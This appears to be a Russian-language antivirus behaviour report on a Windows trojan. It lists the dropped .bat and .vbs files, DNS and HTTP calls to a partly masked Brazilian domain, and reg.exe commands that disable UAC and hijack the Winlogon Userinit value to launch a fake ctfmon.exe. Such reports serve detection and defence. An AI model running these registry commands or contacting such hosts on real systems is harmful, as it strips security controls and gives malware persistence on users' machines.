Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Userinit' = '<SYSTEM32>\userinit.exe,C:\DOCUME~1\%USERNAME%\LOCALS~1\Temp\ctfmon.exe,'
- Средство контроля пользовательских учетных записей (UAC)
- %TEMP%\~1.bat
- <LS_APPDATA>\term.764
- <LS_APPDATA>\term.786
- <LS_APPDATA>\term.xp
- %TEMP%\26429tmp.vbs
- %TEMP%\~1.bat
- %TEMP%\26429tmp.vbs
- 'localhost':1038
- 'ad#.####sbrasiltotal.com.br':80
- http://ad#.####sbrasiltotal.com.br/sal.php?a=###################
- DNS ASK www.go###e.com.br
- DNS ASK ad#.####sbrasiltotal.com.br
- ClassName: '' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c %TEMP%\~1.bat <Полный путь к файлу>
- '<SYSTEM32>\ping.exe' www.go###e.com.br -n 1 -l 1
- '<SYSTEM32>\find.exe' "TTL"
- '%ProgramFiles%\Internet Explorer\IEXPLORE.EXE' "http://ad#.####sbrasiltotal.com.br/sal.php?a=#####################"
- '<SYSTEM32>\fsutil.exe' file createnew "%TEMP%\thunb.db" 666"
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "<SYSTEM32>\userinit.exe,%HOMEPATH%\LOCALS~1\Temp\ctfmon.exe," /f